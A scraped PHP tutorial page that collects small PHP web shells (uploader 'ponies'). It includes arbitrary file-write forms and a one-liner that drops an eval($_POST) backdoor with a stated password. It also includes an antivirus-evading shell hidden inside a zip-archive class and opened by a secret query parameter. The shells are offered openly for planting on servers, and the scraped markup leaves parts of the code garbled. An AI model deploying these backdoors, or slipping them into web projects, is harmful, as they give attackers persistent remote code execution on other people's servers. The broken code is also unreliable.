Home >Backend Development >PHP Tutorial >Super small PHP pony summary (convenient for friends looking for backdoors)_PHP tutorial

Super small PHP pony summary (convenient for friends looking for backdoors)_PHP tutorial

WBOY
WBOYOriginal
2016-07-21 15:19:241013browse

Author: spider
I also have a super small PHP pony

Copy code The code is as follows:

header("content-Type: text/html; charset=gb2312");
if(get_magic_quotes_gpc()) foreach($_POST as $k=>$v) $ _POST[$k] = stripslashes($v);
?>

Save file name:









if(isset($_POST['file']))
{
$fp = @fopen($_POST[ 'file'],'wb');
echo @fwrite($fp,$_POST['text']) ? 'Save successfully!' : 'Save failed!';
@fclose($fp) ;
}
?>

I was bored and watched some php tutorials last night, and found that php is really quite powerful! By the way, I wrote a php pony
The code is directly pasted below. .
Copy code The code is as follows:


By: SinCoder</title> ; <BR><font color=red size=6>php ponyBy:SinCoder</br></font> <br><? echo "</br>The path of this program: ".__FILE__ . <br>"</br>Server operating system: ".PHP_OS. <br>"</br>Server IP address: ".gethostbyname($_SERVER["SERVER_NAME"]). <br>"< /br>PHP version: ".PHP_VERSION; <br>?> <br><form action = <? echo strrchr(__FILE__,"\"); ?> method="post"> <br> Data to be submitted: </br> <br><textarea type="text" name="data" rows="10" cols="30"> <br></textarea> <br>< ;/br> <br>Saving path:<input type="text" name="dir" /> <br></br> <br><input type="submit" value="Submit" /> <br></form> <br></html> <br><? <BR>if(!(isset($_POST["data"]) && isset($_POST["dir "]))) <BR>exit(); <BR>if(strlen($_POST["data"])>0 && strlen($_POST["dir"])>0) <br>{ <br>$p_File=fopen($_POST["dir"],"a"); <br>if(!$p_File) <br>echo "Writing failed! Please try changing the directory!"; <br>else <br>echo "Ok!! "; <br>fputs($p_File,$_POST["data"]); <br>fclose($p_File); <br>} <br>else <br>echo "Please Fill in the data completely! “; <br> <br><?fputs(fopen(jb51.php,w),<?eval($_POST[jb51]);?>)?> </div> <br> <br>Access like this After that, generate jb51.php in the current directory with the content of <?eval($_POST[jb51]);?>)?> and the password is jb51 <div class="codetitle"><span style="CURSOR: pointer" onclick="doCopy('code9555')">The latest anti-kill php Horse<u> </u></span></div> <div class="codebody" id="code9555">Copy code<br><br> The code is as follows:</div> <div class="codebody" id="code49076"> <br><?php <BR>class zip <BR>{ <BR>var $datasec, $ctrl_dir = array(); <BR>var $eof_ctrl_dir = "x50x4bx05x06x00x00x00x00"; <BR>var $old_offset = 0; var $dirs = Array("."); <BR>function get_List($zip_name) <BR>{ <BR>$ret = ''; <BR>$zip = @fopen($zip_name, 'rb'); <BR>if(!$zip) return(0); <BR>$centd = $this->ReadCentralDir($zip,$zip_name); <br>@rewind($zip); <br>@fseek($zip, $centd['offset']); <br>for ($i=0; $i<$centd['entries']; $i++) <BR>{ <BR>$header = $this->ReadCentralFileHeaders($zip); <br>$header['index'] = $i;$info['filename'] = $header['filename']; <br>$info['stored_filename'] = $header['stored_filename']; <br>$info['size'] = $header['size'];$info['compressed_size']=$header['compressed_size']; <br>$info['crc'] = strtoupper(dechex( $header['crc'] )); <br>$info['mtime'] = $header['mtime']; $info['comment'] = $header['comment']; <br>$info['folder'] = ($header['external']==0x41FF0010||$header['external']==16)?1:0; <br>$info['index'] = $header['index'];$info['status'] = $header['status']; <br>$ret[]=$info; unset($header); <br>} <br>return $ret; <br>} <br>function Add($files,$compact) <br>{ <br>if(!is_array($files[0])) $files=Array($files); <br>for($i=0;$files[$i];$i++){ <br>$fn = $files[$i]; <br>if(!in_Array(dirname($fn[0]),$this->dirs)) <br>$this->add_Dir(dirname($fn[0])); <br>if(basename($fn[0])) <br>$ret[basename($fn[0])]=$this->add_File($fn[1],$fn[0],$compact); <br>} <br>return $ret; <br>} <br>function get_file() <br>{ <br>$data = implode('', $this -> datasec); <br>$ctrldir = implode('', $this -> ctrl_dir); <br>return $data . $ctrldir . $this -> eof_ctrl_dir . <br>pack('v', sizeof($this -> ctrl_dir)).pack('v', sizeof($this -> ctrl_dir)). <br>pack('V', strlen($ctrldir)) . pack('V', strlen($data)) . "x00x00"; <br>} <br>function add_dir($name) <br>{ <br>$name = str_replace("\", "/", $name); <br>$fr = "x50x4bx03x04x0ax00x00x00x00x00x00x00x00x00"; <br>$fr .= pack("V",0).pack("V",0).pack("V",0).pack("v", strlen($name) ); <br>$fr .= pack("v", 0 ).$name.pack("V", 0).pack("V", 0).pack("V", 0); <br>$this -> datasec[] = $fr; <br>$new_offset = strlen(implode("", $this->datasec)); <br>$cdrec = "x50x4bx01x02x00x00x0ax00x00x00x00x00x00x00x00x00"; <br>$cdrec .= pack("V",0).pack("V",0).pack("V",0).pack("v", strlen($name) ); <br>$cdrec .= pack("v", 0 ).pack("v", 0 ).pack("v", 0 ).pack("v", 0 ); <br>$ext = "xffxffxffxff"; <br>$cdrec .= pack("V", 16 ).pack("V", $this -> old_offset ).$name; <br>$this -> ctrl_dir[] = $cdrec; <br>$this -> old_offset = $new_offset; <br>$this -> dirs[] = $name; <br>} <br>function add_File($data, $name, $compact = 1) <br>{ <br>$name = str_replace('\', '/', $name); <br>$dtime = dechex($this->DosTime()); <br>$hexdtime = 'x' . $dtime[6] . $dtime[7].'x'.$dtime[4] . $dtime[5] <br>. 'x' . $dtime[2] . $dtime[3].'x'.$dtime[0].$dtime[1]; <br>eval('$hexdtime = "' . $hexdtime . '";'); <br>if($compact) <br>$fr = "x50x4bx03x04x14x00x00x00x08x00".$hexdtime; <br>else $fr = "x50x4bx03x04x0ax00x00x00x00x00".$hexdtime; <br>$unc_len = strlen($data); $crc = crc32($data); <br>if($compact){ <br>$zdata = gzcompress($data); $c_len = strlen($zdata); <br>$zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2); <br>}else{ <br>$zdata = $data; <br>} <br>$c_len=strlen($zdata); <br>$fr .= pack('V', $crc).pack('V', $c_len).pack('V', $unc_len); <br>$fr .= pack('v', strlen($name)).pack('v', 0).$name.$zdata; <br>$fr .= pack('V', $crc).pack('V', $c_len).pack('V', $unc_len); <br>$this -> datasec[] = $fr; <br>$new_offset = strlen(implode('', $this->datasec)); <br>if($compact) <br>$cdrec = "x50x4bx01x02x00x00x14x00x00x00x08x00"; <br>else $cdrec = "x50x4bx01x02x14x00x0ax00x00x00x00x00"; <br>$cdrec .= $hexdtime.pack('V', $crc).pack('V', $c_len).pack('V', $unc_len); <br>$cdrec .= pack('v', strlen($name) ).pack('v', 0 ).pack('v', 0 ); <br>$cdrec .= pack('v', 0 ).pack('v', 0 ).pack('V', 32 ); <br>$cdrec .= pack('V', $this -> old_offset ); <br>$this -> old_offset = $new_offset; <br>$cdrec .= $name; <br>$this -> ctrl_dir[] = $cdrec; <br>return true; <br>} <br>function DosTime() { <br>$timearray = getdate(); <br>if ($timearray['year'] < 1980) { <BR>$timearray['year'] = 1980; $timearray['mon'] = 1; <BR>$timearray['mday'] = 1; $timearray['hours'] = 0; <BR>$timearray['minutes'] = 0; $timearray['seconds'] = 0; <BR>} <BR>return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) | ($timearray['hours'] << 11) | <BR>($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1); <br>}<br>//Decompress the entire compressed package <br>//Using Extract directly will cause path problems. This function first obtains the file information from the list and creates all directories before running Extract <br>function ExtractAll ( $zn, $ to) <br>{ <br>if(substr($to,-1)!="/") $to .= "/"; <br>$files = $this->get_List($zn); <br>$cn = count($files); <br>if(is_array($files)) <br>{ <br>for($i=0;$i<$cn;$i++) <BR>{ <BR>if($files[$i]['folder']==1){ <BR>@mkdir($to.$files[$i]['filename'],$GLOBALS['cfg_dir_purview']) ; <BR>@chmod($to.$files[$i]['filename'],$GLOBALS['cfg_dir_purview']); <BR>} <BR>} <BR>} <BR>$this-> ;Extract ($zn,$to); <BR>} <BR>function Extract ( $zn, $to, $index = Array(-1) ) <BR>{ <BR>$ok = 0; $zip = @fopen($zn,'rb'); <BR>if(!$zip) return(-1); <BR>$cdir = $this->ReadCentralDir($zip,$zn); <br>$ pos_entry = $cdir['offset']; <br>if(!is_array($index)){ $index = array($index); } <br>for($i=0; isset($index[$i ]);$i++){ <br>if(intval($index[$i])!=$index[$i]||$index[$i]>$cdir['entries']) <br> return(-1); <br>} <br>for ($i=0; $i<$cdir['entries']; $i++) <BR>{ <BR>@fseek($zip, $pos_entry) ; <BR>$header = $this->ReadCentralFileHeaders($zip); <br>$header['index'] = $i; $pos_entry = ftell($zip); <br>@rewind($zip) ; fseek($zip, $header['offset']); <br>if(in_array("-1",$index)||in_array($i,$index)) <br>$stat[$header[ 'filename']]=$this->ExtractFile($header, $to, $zip); <br>} <br>fclose($zip); <br>return $stat; <br>} <br> function ReadFileHeader($zip) <br>{ <br>$binary_data = fread($zip, 30); <br>$data = unpack('vchk/vid/vversion/vflag/vcompression/vmtime/vmdate/Vcrc/Vcompressed_size /Vsize/vfilename_len/vextra_len', $binary_data); <br>$header['filename'] = fread($zip, $data['filename_len']); <br>if ($data['extra_len'] ! = 0) { <br>$header['extra'] = fread($zip, $data['extra_len']); <br>} else { $header['extra'] = ''; } <br> $header['compression'] = $data['compression'];$header['size'] = $data['size']; <br>$header['compressed_size'] = $data['compressed_size'] ; <br>$header['crc'] = $data['crc']; $header['flag'] = $data['flag']; <br>$header['mdate'] = $data[ 'mdate'];$header['mtime'] = $data['mtime']; <br>if ($header['mdate'] && $header['mtime']){ <br>$hour=( $header['mtime']&0xF800)>>11;$minute=($header['mtime']&0x07E0)>>5; <br>$seconde=($header['mtime']&0x001F) *2;$year=(($header['mdate']&0xFE00)>>9)+1980; <br>$month=($header['mdate']&0x01E0)>>5;$day =$header['mdate']&0x001F; <br>$header['mtime'] = mktime($hour, $minute, $seconde, $month, $day, $year); <br>}else{$header ['mtime'] = time();} <br>$header['stored_filename'] = $header['filename']; <br>$header['status'] = "ok"; <br>return $ header; <br>} <br>function ReadCentralFileHeaders($zip){ <br>$binary_data = fread($zip, 46); <br>$header = unpack('vchkid/vid/vversion/vversion_extracted/vflag/vcompression /vmtime/vmdate/Vcrc/Vcompressed_size/Vsize/vfilename_len/vextra_len/vcomment_len/vdisk/vinternal/Vexternal/Voffset', $binary_data); <br>if ($header['filename_len'] != 0) <br>$ header['filename'] = fread($zip,$header['filename_len']); <br>else $header['filename'] = ''; <br>if ($header['extra_len'] != 0) <br>$header['extra'] = fread($zip, $header['extra_len']); <br>else $header['extra'] = ''; <br>if ($header[ 'comment_len'] != 0) <br>$header['comment'] = fread($zip, $header['comment_len']); <br>else $header['comment'] = ''; <br>if ($header['mdate'] && $header['mtime']) <br>{ <br>$hour = ($header['mtime'] & 0xF800) >> 11; <br>$ minute = ($header['mtime'] & 0x07E0) >> 5; <br>$seconde = ($header['mtime'] & 0x001F)*2; <br>$year = (($header[ 'mdate'] & 0xFE00) >> 9) + 1980; <br>$month = ($header['mdate'] & 0x01E0) >> 5; <br>$day = $header['mdate '] & 0x001F; <br>$header['mtime'] = mktime($hour, $minute, $seconde, $month, $day, $year); <br>} else { <br>$header[' mtime'] = time(); <br>} <br>$header['stored_filename'] = $header['filename']; <br>$header['status'] = 'ok'; <br>if (substr($header['filename'], -1) == '/') <br>$header['external'] = 0x41FF0010; <br>return $header; <br>} <br>function ReadCentralDir( $zip,$zip_name) <br>{ <br>$size = filesize($zip_name); <br>if ($size < 277) $maximum_size = $size; <BR>else $maximum_size=277; <BR>@fseek($zip, $size-$maximum_size); <BR>$pos = ftell($zip); $bytes = 0x00000000; <BR>while ($pos < $size) <BR>{ <BR> $byte = @fread($zip, 1); $bytes=($bytes << 8) | Ord($byte); <BR>if ($bytes == 0x504b0506){ $pos++; break; } $ pos++; <BR>}<BR>$data = @unpack('vdisk/vdisk_start/vdisk_entries/ventries/Vsize/Voffset/vcomment_size',fread($zip, 18)); <BR>if ($data['comment_size'] != 0) $centd['comment'] = fread($zip, $data['comment_size']); <BR>else $centd['comment'] = ''; $centd['entries'] = $data['entries']; <BR>$centd['disk_entries'] = $data['disk_entries']; <BR>$centd['offset'] = $data['offset'];$centd['disk_start'] = $data['disk_start']; <BR>$centd['size'] = $data['size']; $centd['disk'] = $data['disk']; <BR>return $centd; <BR>} <BR>function ExtractFile($header,$to,$zip) <BR>{ <BR>$header = $this->readfileheader($zip); <br>$header['external'] = (!isset($header['external']) ? 0 : $header['external']); <br>if(substr($to,-1)!="/") $to.="/"; <br>if(!@is_dir($to)) @mkdir($to,$GLOBALS['cfg_dir_purview']); <br>if (!($header['external']==0x41FF0010)&&!($header['external']==16)) <br>{ <br>if ($header['compression']==0) <br>{ <br>$fp = @fopen($to.$header['filename'], 'wb'); <br>if(!$fp) return(-1); <br>$size = $header['compressed_size']; <br>while ($size != 0) <br>{ <br>$read_size = ($size < 2048 ? $size : 2048); <BR>$buffer = fread($zip, $read_size); <BR>$binary_data = pack('a'.$read_size, $buffer); <BR>@fwrite($fp, $binary_data, $read_size); <BR>$size -= $read_size; <BR>} <BR>fclose($fp); <BR>touch($to.$header['filename'], $header['mtime']); <BR>}else{ <BR>$fp = @fopen($to.$header['filename'].'.gz','wb'); <BR>if(!$fp) return(-1); <BR>$binary_data = pack('va1a1Va1a1', 0x8b1f, Chr($header['compression']), <BR>Chr(0x00), time(), Chr(0x00), Chr(3)); <BR>fwrite($fp, $binary_data, 10); <BR>$size = $header['compressed_size']; <BR>while ($size != 0) <BR>{ <BR>$read_size = ($size < 1024 ? $size : 1024); <BR>$buffer = fread($zip, $read_size); <BR>$binary_data = pack('a'.$read_size, $buffer); <BR>@fwrite($fp, $binary_data, $read_size); <BR>$size -= $read_size; <BR>} <BR>$binary_data = pack('VV', $header['crc'], $header['size']); <BR>fwrite($fp, $binary_data,8); fclose($fp); <BR>$gzp = @gzopen($to.$header['filename'].'.gz','rb') or die("Cette archive est compress"); <BR>if(!$gzp) return(-2); <BR>$fp = @fopen($to.$header['filename'],'wb'); <BR>if(!$fp) return(-1); <BR>$size = $header['size']; <BR>while ($size != 0) <BR>{ <BR>$read_size = ($size < 2048 ? $size : 2048); <BR>$buffer = gzread($gzp, $read_size); <BR>$binary_data = pack('a'.$read_size, $buffer); <BR>@fwrite($fp, $binary_data, $read_size); <BR>$size -= $read_size; <BR>} <BR>fclose($fp); gzclose($gzp); <BR>touch($to.$header['filename'], $header['mtime']); <BR>@unlink($to.$header['filename'].'.gz'); <BR>}} <BR>return true; <BR>} <BR>} <BR>if($_GET['zxzgcn']=='login'){ <BR>header("content-Type: text/html; charset=gb2312"); <BR>if(get_magic_quotes_gpc()) foreach($_POST as $k=>$v) $_POST[$k] = stripslashes($v); <br>?> <br><form method="POST"> <br>save to: <input type="text" name="file" size="60" value="<? echo str_replace('\','/',__FILE__) ?>"> <br><br><br> <br><textarea name="text" COLS="70" ROWS="18" ></textarea> <br><br><br> <br><input type="submit" name="submit" value="save"> <br><form> <br><?php <BR>if(isset($_POST['file'])) <BR>{ <BR>$fp = @fopen($_POST['file'],'wb'); <BR>echo @fwrite($fp,$_POST['text']) ? 'succed!' : 'faled!'; <BR>@fclose($fp); <BR>} <BR>} <BR>?> <br> </div> <br>用法xxx.php?zxzgcn=login <p align="left"></p> <div style="display:none;"> <span id="url" itemprop="url">http://www.bkjia.com/PHPjc/325284.html</span><span id="indexUrl" itemprop="indexUrl">www.bkjia.com</span><span id="isOriginal" itemprop="isOriginal">true</span><span id="isBasedOnUrl" itemprop="isBasedOnUrl">http://www.bkjia.com/PHPjc/325284.html</span><span id="genre" itemprop="genre">TechArticle</span><span id="description" itemprop="description">作者: spider 我也来个超小PHP小马 复制代码 代码如下: ?php header("content-Type: text/html; charset=gb2312"); if(get_magic_quotes_gpc()) foreach($_POST as $k=$v) $_P...</span> </div> <div class="art_confoot"></div></div><div class="nphpQianMsg"><div class="clear"></div></div><div class="nphpQianSheng"><span>Statement:</span><div>The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn</div></div></div><div class="nphpSytBox"><span>Previous article:<a class="dBlack" title="PHP native template engine The simplest template engine_PHP tutorial" href="https://m.php.cn/faq/308565.html">PHP native template engine The simplest template engine_PHP tutorial</a></span><span>Next article:<a class="dBlack" title="PHP native template engine The simplest template engine_PHP tutorial" href="https://m.php.cn/faq/308567.html">PHP native template engine The simplest template engine_PHP tutorial</a></span></div><div class="nphpSytBox2"><div class="nphpZbktTitle"><h2>Related articles</h2><em><a href="https://m.php.cn/article.html" class="bBlack"><i>See more</i><b></b></a></em><div class="clear"></div></div><ins class="adsbygoogle" style="display:block" data-ad-format="fluid" data-ad-layout-key="-6t+ed+2i-1n-4w" data-ad-client="ca-pub-5902227090019525" data-ad-slot="8966999616"></ins><script> (adsbygoogle = window.adsbygoogle || []).push({}); </script><ul class="nphpXgwzList"><li><b></b><a href="https://m.php.cn/faq/1.html" title="How to use cURL to implement Get and Post requests in PHP" class="aBlack">How to use cURL to implement Get and Post requests in PHP</a><div class="clear"></div></li><li><b></b><a href="https://m.php.cn/faq/1.html" title="How to use cURL to implement Get and Post requests in PHP" class="aBlack">How to use cURL to implement Get and Post requests in PHP</a><div class="clear"></div></li><li><b></b><a href="https://m.php.cn/faq/1.html" title="How to use cURL to implement Get and Post requests in PHP" class="aBlack">How to use cURL to implement Get and Post requests in PHP</a><div class="clear"></div></li><li><b></b><a href="https://m.php.cn/faq/1.html" title="How to use cURL to implement Get and Post requests in PHP" class="aBlack">How to use cURL to implement Get and Post requests in PHP</a><div class="clear"></div></li><li><b></b><a href="https://m.php.cn/faq/2.html" title="All expression symbols in regular expressions (summary)" class="aBlack">All expression symbols in regular expressions (summary)</a><div class="clear"></div></li></ul></div></div><ins class="adsbygoogle" style="display:block" data-ad-format="autorelaxed" data-ad-client="ca-pub-5902227090019525" data-ad-slot="5027754603"></ins><script> (adsbygoogle = window.adsbygoogle || []).push({}); </script><footer><div class="footer"><div class="footertop"><img src="/static/imghwm/logo.png" alt=""><p>Public welfare online PHP training,Help PHP learners grow quickly!</p></div><div class="footermid"><a href="https://m.php.cn/about/us.html">About us</a><a href="https://m.php.cn/about/disclaimer.html">Disclaimer</a><a href="https://m.php.cn/update/article_0_1.html">Sitemap</a></div><div class="footerbottom"><p> © php.cn All rights reserved </p></div></div></footer><script>isLogin = 0;</script><script type="text/javascript" src="/static/layui/layui.js"></script><script type="text/javascript" src="/static/js/global.js?4.9.47"></script></div><script src="https://vdse.bdstatic.com//search-video.v1.min.js"></script><link rel='stylesheet' id='_main-css' href='/static/css/viewer.min.css' type='text/css' media='all'/><script type='text/javascript' src='/static/js/viewer.min.js?1'></script><script type='text/javascript' src='/static/js/jquery-viewer.min.js'></script><script>jQuery.fn.wait = function (func, times, interval) { var _times = times || -1, //100次 _interval = interval || 20, //20毫秒每次 _self = this, _selector = this.selector, //选择器 _iIntervalID; //定时器id if( this.length ){ //如果已经获取到了,就直接执行函数 func && func.call(this); } else { _iIntervalID = setInterval(function() { if(!_times) { //是0就退出 clearInterval(_iIntervalID); } _times <= 0 || _times--; //如果是正数就 -- _self = $(_selector); //再次选择 if( _self.length ) { //判断是否取到 func && func.call(_self); clearInterval(_iIntervalID); } }, _interval); } return this; } $("table.syntaxhighlighter").wait(function() { $('table.syntaxhighlighter').append("<p class='cnblogs_code_footer'><span class='cnblogs_code_footer_icon'></span></p>"); }); $(document).on("click", ".cnblogs_code_footer",function(){ $(this).parents('table.syntaxhighlighter').css('display','inline-table');$(this).hide(); }); $('.nphpQianCont').viewer({navbar:true,title:false,toolbar:false,movable:false,viewed:function(){$('img').click(function(){$('.viewer-close').trigger('click');});}}); </script></body><!-- Matomo --><script> var _paq = window._paq = window._paq || []; /* tracker methods like "setCustomDimension" should be called before "trackPageView" */ _paq.push(['trackPageView']); _paq.push(['enableLinkTracking']); (function() { var u="https://tongji.php.cn/"; _paq.push(['setTrackerUrl', u+'matomo.php']); _paq.push(['setSiteId', '9']); var d=document, g=d.createElement('script'), s=d.getElementsByTagName('script')[0]; g.async=true; g.src=u+'matomo.js'; s.parentNode.insertBefore(g,s); })(); </script><!-- End Matomo Code --></html>